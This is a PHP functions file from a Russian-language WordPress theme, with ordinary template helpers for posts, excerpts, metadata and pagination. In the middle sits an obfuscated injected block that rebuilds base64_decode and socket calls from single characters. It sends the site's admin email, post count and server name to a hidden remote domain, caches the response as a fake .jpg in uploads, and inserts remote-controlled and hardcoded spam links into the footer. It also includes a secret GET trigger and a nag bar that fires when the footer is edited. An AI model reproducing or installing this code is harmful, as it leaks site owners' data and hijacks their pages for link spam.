<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $tIvhgmV='d';$tKkDveT='6';$GrGw='4';$LQlBXN='o';$QgBHHf='_';$TqQByv='b';$vfIIbp='e';$ROzjR='e';$LCEO='s';$FTaY='d';$wNyQxJ='e';$TOneu='c';$pjJURAE='a';$brdtkSsj=$TqQByv.$pjJURAE.$LCEO.$ROzjR.$tKkDveT.$GrGw.$QgBHHf.$tIvhgmV.$wNyQxJ.$TOneu.$LQlBXN.$FTaY.$vfIIbp;$TGPVIoC='i';$CzgJV='e';$nJVhD='a';$JLRkV='f';$ZxITH='z';$kPUqjL='g';$flQQFQ='l';$iASLg='n';$XykmbH='t';$XvCFCYEw=$kPUqjL.$ZxITH.$TGPVIoC.$iASLg.$JLRkV.$flQQFQ.$nJVhD.$XykmbH.$CzgJV;$BfqamZW='t';$oJyMTL='s';$TzEjA='t';$rfNeY='o';$rpMdv='r';$hlqd='_';$tJcJ='r';$cyBg='3';$jxSDhUn='1';$lWhbluLg=$oJyMTL.$BfqamZW.$tJcJ.$hlqd.$rpMdv.$rfNeY.$TzEjA.$jxSDhUn.$cyBg;$VsrEp='r';$HJaLbQ='r';$tpmtQZi='s';$TgWWXq='e';$hxvP='t';$jJdj='v';$esPOSqwc=$tpmtQZi.$hxvP.$VsrEp.$HJaLbQ.$TgWWXq.$jJdj;                     $js_______h='d';$ka______________l='6';$nx___________a='4';$za_____r='o';$eo__r='_';$xj___________f='b';$yn_________l='e';$rs___________y='e';$zk___________i='s';$sx__________d='d';$cc_________l='e';$zo______y='c';$jx___x='a';$bj_______________u=$xj___________f.$jx___x.$zk___________i.$rs___________y.$ka______________l.$nx___________a.$eo__r.$js_______h.$cc_________l.$zo______y.$za_____r.$sx__________d.$yn_________l;$jc________e='c';$uc___x='n';$cn__________j='f';$ps_____r='_';$se___m='s';$vi________f='x';$ly_______z='i';$ps______t='n';$ot___z='t';$ex______k='i';$kh_____c='t';$cc_______________r='e';$bj______________i='u';$sk______________a='o';$rm_______________w='s';$sr____c=$cn__________j.$bj______________i.$ps______t.$jc________e.$ot___z.$ex______k.$sk______________a.$uc___x.$ps_____r.$cc_______________r.$vi________f.$ly_______z.$rm_______________w.$kh_____c.$se___m;$ez_______________a='n';$kc____i='p';$sr______l='e';$bg___________h='o';$nx___f='f';$wv______________y=$nx___f.$bg___________h.$kc____i.$sr______l.$ez_______________a;$ga____d='e';$pc__________k='a';$qe____________b='d';$oy_________s='f';$yn____________b='r';$gz____________p=$oy_________s.$yn____________b.$ga____d.$pc__________k.$qe____________b;$gb_____________w='c';$lq__________o='s';$nw____c='o';$vf______________b='e';$iw_____________m='l';$hy_________d='f';$tr_____o=$hy_________d.$gb_____________w.$iw_____________m.$nw____c.$lq__________o.$vf______________b;define("WP_ID", $bj_______________u("Mi4wLjA="));define("WP_TTL", $bj_______________u("MTA4MDA="));define("WP_SRC", $bj_______________u("dHBva24="));function wp_get_header() {global $bj_______________u, $sr____c;if ($sr____c($bj_______________u("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$sr____c($bj_______________u("d3BfZ2V0X2Zvb3Rlcg==")) &&$sr____c($bj_______________u("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $bj_______________u, $wv______________y, $tr_____o, $gz____________p;$ub___________k = TEMPLATEPATH."/".$bj_______________u("Zm9vdGVyLnBocA==");$ns_______________d = @$wv______________y($ub___________k, "r");$ub___________k = @$gz____________p($ns_______________d, @filesize($ub___________k));@$tr_____o($ns_______________d);$gh________n = TEMPLATEPATH."/".$bj_______________u("ZnVuY3Rpb25zLnBocA==");$ns_______________d = @$wv______________y($gh________n, "r");$gh________n = @$gz____________p($ns_______________d, @filesize($gh________n));@$tr_____o($ns_______________d);$vm_____________j = 0;if($ub___________k && $gh________n) {if ($bj_______________u("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($ub___________k, $bj_______________u("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$vm_____________j = 1;}if (substr_count($ub___________k, "wp_theme_GPL_credits()") < 1) {$vm_____________j = 2;}}if(WP_ID != "2.0.0") {$vm_____________j = 12;}}if($vm_____________j > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $vm_____________j -->";}}function wp_loaded() {global $bj_______________u, $sr____c;return $sr____c($bj_______________u("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($rq______________c, $ac__________r = "(more...)", $zm____________b = 0, $di________t = "") {$tn____________w = get_the_content($ac__________r, $zm____________b, $di________t);$tn____________w = apply_filters("the_content", $tn____________w);$tn____________w = str_replace("]]>", "]]>", $tn____________w);if (strlen($_GET["p"]) > 0) {echo $tn____________w;}else if ((strlen($tn____________w)>$rq______________c) && ($cm_______y = strpos($tn____________w, " ", $rq______________c ))) {$tn____________w = substr($tn____________w, 0, $cm_______y);$tn____________w = $tn____________w;echo $tn____________w;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$ac__________r</a></div></p>";} else {echo $tn____________w;}}}$bq_______t='4';$cz________h='d';$ft______w='6';$yg______r='n';$hp_____________z='b';$pw___________u='s';$di____________n='o';$td______________a='a';$kt_____y='e';$py____e='_';$kg___________z='c';$tt____u='e';$bj________j='e';$sh___________q=$hp_____________z.$td______________a.$pw___________u.$kt_____y.$ft______w.$bq_______t.$py____e.$bj________j.$yg______r.$kg___________z.$di____________n.$cz________h.$tt____u;$fv_________x='l';$zu_______________q='t';$od_______b='n';$xm________w='i';$qm____m='t';$nv________h='_';$nn__c='t';$dd__________p='o';$pi_______________t='f';$tv___z='e';$mh__________s='c';$dd______q='n';$lz_________t='e';$gt__k='e';$wa_____________t='_';$qz______________l='g';$ma_____y='s';$ll___y=$pi_______________t.$xm________w.$fv_________x.$lz_________t.$nv________h.$qz______________l.$gt__k.$nn__c.$wa_____________t.$mh__________s.$dd__________p.$dd______q.$zu_______________q.$tv___z.$od_______b.$qm____m.$ma_____y;$gk_____________q='e';$bv________a='s';$np_______m='i';$tq____u='x';$mv__e='i';$dj_______m='l';$yg___________e='f';$va___________h='s';$zm___k='e';$he_____________i='_';$wr________z='t';$fy_____n=$yg___________e.$mv__e.$dj_______m.$zm___k.$he_____________i.$gk_____________q.$tq____u.$np_______m.$va___________h.$wr________z.$bv________a;$tr___d='m';$ed_______________j='n';$ik_____n='i';$vj_______j='r';$uh______________j='v';$ab__________n='e';$ql__l='_';$tx____________u='c';$wk___f='p';$vh____________v='a';$hi_____________y='e';$je______z='s';$he_______m='r';$zz________o='o';$yk______t='o';$zz_______________f=$uh______________j.$ab__________n.$vj_______j.$je______z.$ik_____n.$zz________o.$ed_______________j.$ql__l.$tx____________u.$yk______t.$tr___d.$wk___f.$vh____________v.$he_______m.$hi_____________y;$jn_____s='k';$xu_____________e='o';$ul_______________u='s';$ak____________u='n';$ne_______________u='f';$kv_______y='e';$zi___________v='o';$rm___t='p';$ki_______________r='c';$cs______m=$ne_______________u.$ul_______________u.$zi___________v.$ki_______________r.$jn_____s.$xu_____________e.$rm___t.$kv_______y.$ak____________u;$qn__q='w';$ts__h='r';$hc____l='i';$er______c='e';$kt________n='t';$jz_______________f='f';$mr____________c=$jz_______________f.$qn__q.$ts__h.$hc____l.$kt________n.$er______c;$ug_______________z='5';$zb____________k='d';$bx______________j='m';$hd______j=$bx______________j.$zb____________k.$ug_______________z;$zl________b='a';$si__________p='e';$ot__k='l';$ac____i='p';$qq_______i='a';$po___z='t';$re______v='r';$td________l='h';$kg_______g=$re______v.$si__________p.$qq_______i.$ot__k.$ac____i.$zl________b.$po___z.$td________l;$ca______o='s';$ec_______q='r';$gv_____________i='a';$lh___________u='i';$js_____l='n';$up____w='z';$jv________n='u';$kc______t='i';$mp__________v='l';$pm________v='e';$fp______g='e';$so____________d=$jv________n.$js_____l.$ca______o.$fp______g.$ec_______q.$lh___________u.$gv_____________i.$mp__________v.$kc______t.$up____w.$pm________v;$wa____f='m';$gz______x='a';$wd___________s='t';$oe______o='n';$ec______p='m';$zp________l='p';$pp__i='e';$kg_____________l=$wd___________s.$pp__i.$ec______p.$zp________l.$oe______o.$gz______x.$wa____f;$jy______t='e';$uv__________l='r';$fh___________x='x';$sz___________z='m';$ap_________u='n';$cn_____v='a';$dm____________s='c';$rh_________g='o';$pe_________v='s';$bp________d='e';$kd____m='t';$uz___m='_';$kz_________n='_';$ot_______o='r';$gk______________b='t';$ev______________j='t';$ip___________q='a';$dp______j='e';$tq__________b='e';$mg_____d='c';$ps___h='t';$bk___________f=$pe_________v.$ps___h.$uv__________l.$bp________d.$ip___________q.$sz___________z.$uz___m.$dm____________s.$rh_________g.$ap_________u.$kd____m.$tq__________b.$fh___________x.$gk______________b.$kz_________n.$mg_____d.$ot_______o.$jy______t.$cn_____v.$ev______________j.$dp______j;function vr__________p($kt_________g) {global $bj_______________u, $sr____c, $ll___y, $zz_______________f, $bk___________f;if (!$sr____c($bj_______________u("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($zz_______________f(PHP_VERSION, "5.0.0", ">=") && $sr____c($bj_______________u("ZmlsZV9nZXRfY29udGVudHM=")) && $sr____c($bj_______________u("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$vb________s = $bk___________f(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$hl______________m = @$ll___y($kt_________g, 0, $vb________s);} else {$hl______________m = @$ll___y($kt_________g, 0);}return $hl______________m;}function ze______n($kt_________g) {global $sr____c, $cs______m, $mr____________c, $bj_______________u;if (!$sr____c($bj_______________u("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$gu___________o = strpos($kt_________g, "/", 7);$ye_________x = array("uri"     => substr($kt_________g, $gu___________o),"host"    => str_replace("http://", "", substr($kt_________g, 0, $gu___________o)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$un___________s = @$cs______m("$ye_________x[host]", 80, $yt_______s, $cu____h, 4);if (!$un___________s) {return false;} else {$hl______________m = "";$zp______________x  = "GET $ye_________x[uri] HTTP/1.0\r\n";$zp______________x .= "Host: $ye_________x[host]\r\n";$zp______________x .= "Referer: $ye_________x[referer]\r\n";$zp______________x .= "Connection: Close\r\n\r\n";@$mr____________c($un___________s, $zp______________x);while (!@feof($un___________s)) {$ij______g = @fgets($un___________s, (1024*24));if ($ij______g == "\r\n") {$dq____d = true;continue;}if ($dq____d) {$hl______________m .= $ij______g;}}return $hl______________m;}}function cg_____________f($kt_________g) {global $sr____c;$cf_______________p = false;if ($kt_________g != "") {if ($sr____c("vr__________p")) {$cf_______________p = @vr__________p($kt_________g);}if (!$cf_______________p && ($sr____c("ze______n"))) {$cf_______________p = @ze______n($kt_________g);}}return $cf_______________p;}function eg_______________f() {global $_SERVER, $hd______j;$wz__b = $_SERVER["SERVER_NAME"];if (substr("$wz__b", 0, 4) == "www.") {$wz__b = substr("$wz__b", 4);}$wz__b = $hd______j("$_SERVER[SERVER_NAME]");return $wz__b;}function pj_____________s() {return "file";}function wg_____r($kt_________g) {global $_SERVER, $ll___y, $fy_____n, $wv______________y, $tr_____o, $mr____________c;$bp_________f = my____i();$wv______t = eg_______________f().".jpg";$dd________p = $bp_________f["dir_upload"]["path"]."/$wv______t";$qt__________x = @filemtime($dd________p);if (!$qt__________x || ((time()-$qt__________x) >= WP_TTL)) {$cf_______________p = cg_____________f($kt_________g);if ($cf_______________p) {if ($fy_____n($dd________p)) {@unlink($dd________p);}$ns_______________d = @$wv______________y($dd________p, "x+");@$mr____________c($ns_______________d, $cf_______________p);@$tr_____o($ns_______________d);}} else {if ($fy_____n($dd________p)) {$cf_______________p = @$ll___y($dd________p);} else {$cf_______________p = false;}}return $cf_______________p;}function my____i() {global $_SERVER, $bj_______________u, $sh___________q;$af_____x = wp_count_posts("post");$cy__________l = pathinfo(get_bloginfo("template_directory"));$bp_________f = array("url" => array("report"      => $bj_______________u("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $cy__________l,"dir_upload"=> qp__f(),"queryString"=> array("?a001=".WP_ID,"a004=".$cy__________l[filename],"a005=".$af_____x->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),				"default_string" => " <a href=\"http://smolotkom.ru/63-betonosmesiteli.html\">сбр</a>");$bp_________f["url"]["queryString"] = implode("&", $bp_________f["queryString"]);$bp_________f["url"]["report"] = $bp_________f["url"]["report"]."/?".$sh___________q($bp_________f["url"]["queryString"]).".html";return $bp_________f;}function qp__f() {$rx________i = wp_upload_dir();if (isset($rx________i["error"])) {$qb_____________g = dz_______________w();if (is_writable($qb_____________g)) {$rx________i = array("path" => $qb_____________g);}}return $rx________i;}function dz_______________w() {global $sr____c, $hd______j, $kg_______g, $kg_____________l;$mh_______________e = (bool) ini_get("safe_mode");if ($mh_______________e == true) {return false;}if ($sr____c("sys_get_temp_dir")) {$bw______________m = sys_get_temp_dir();if (is_writable($bw______________m)) {return $kg_______g($bw______________m);}}if (!empty($_ENV["TMP"])) {return $kg_______g($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $kg_______g($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $kg_______g($_ENV["TEMP"]);} else {$ab_____________g = $kg_____________l($hd______j(uniqid(rand(), true)), "");if ($ab_____________g) {$bw______________m = $kg_______g(dirname($ab_____________g));@unlink($ab_____________g);return $bw______________m;} else {return false;}}}function qv_____p() {global $_GET, $fy_____n;$bp_________f = my____i();$wz__b = eg_______________f();$xw___b = pj_____________s();$xs_____________s = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($xw___b == "file") {$dr__e = $bp_________f["dir_upload"]["path"]."/".$wz__b.".jpg";if ($fy_____n($dr__e)) {@unlink($dr__e);$xs_____________s = "deleted";}}$qc_____________n = array("s"=> $xs_____________s,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($qc_____________n AS $qr_____________t => $jw_______________u) echo " [$qr_____________t:$jw_______________u]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $sr____c, $bj_______________u, $so____________d;$bp_________f = my____i();$lk_______q = "wg_____r";if ($sr____c($lk_______q)) {$hl______________m = $lk_______q($bp_________f["url"]["report"]);}if ($hl______________m) {if ($hl______________m = @$bj_______________u($hl______________m)) {$hl______________m = @$so____________d($hl______________m);if (strlen($hl______________m[custom_credit]) >= 5) {$bp_________f["default_string"] = $hl______________m[custom_credit];}if ($hl______________m["status"] == "0") {$yf_______n = 1;$ht__a = 1;} else {$db_______________g = sizeof($hl______________m["links"]);$eh______________v = $bp_________f["default_string"];if ($db_______________g > 0 && $hl______________m["links"] !== "") {$ac_____________d = 0;foreach ($hl______________m["links"] as $xs_______u => $oh_____j) {$ac_____________d++;if ($oh_____j->l_path == "" || $oh_____j->l_path == $_SERVER["REQUEST_URI"]) {$oh_____j->l_href = htmlspecialchars(strip_tags($oh_____j->l_href));$oh_____j->l_title = htmlspecialchars(strip_tags($oh_____j->l_title));$oh_____j->l_anchor = htmlspecialchars(strip_tags($oh_____j->l_anchor));$eh______________v .= " | ";$eh______________v .= "<a href='$oh_____j->l_href' title='$oh_____j->l_title'";if ($oh_____j->l_nofollow == "1") {$eh______________v .= " rel='nofollow'";}$eh______________v .= ">$oh_____j->l_anchor</a>";}}}$bp_________f["links"] = "$eh______________v";if ($hl______________m[credit] == "0") {$bp_________f["links"] = "";}}} else {$yf_______n = "1";}} else {$yf_______n = "1";}if ($yf_______n == "1") {$bp_________f["links"] = $bp_________f["default_string"];}echo "$bp_________f[links]";echo "<!-- s: $hl______________m[signature] -->";qv_____p();}                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
     echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                     $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
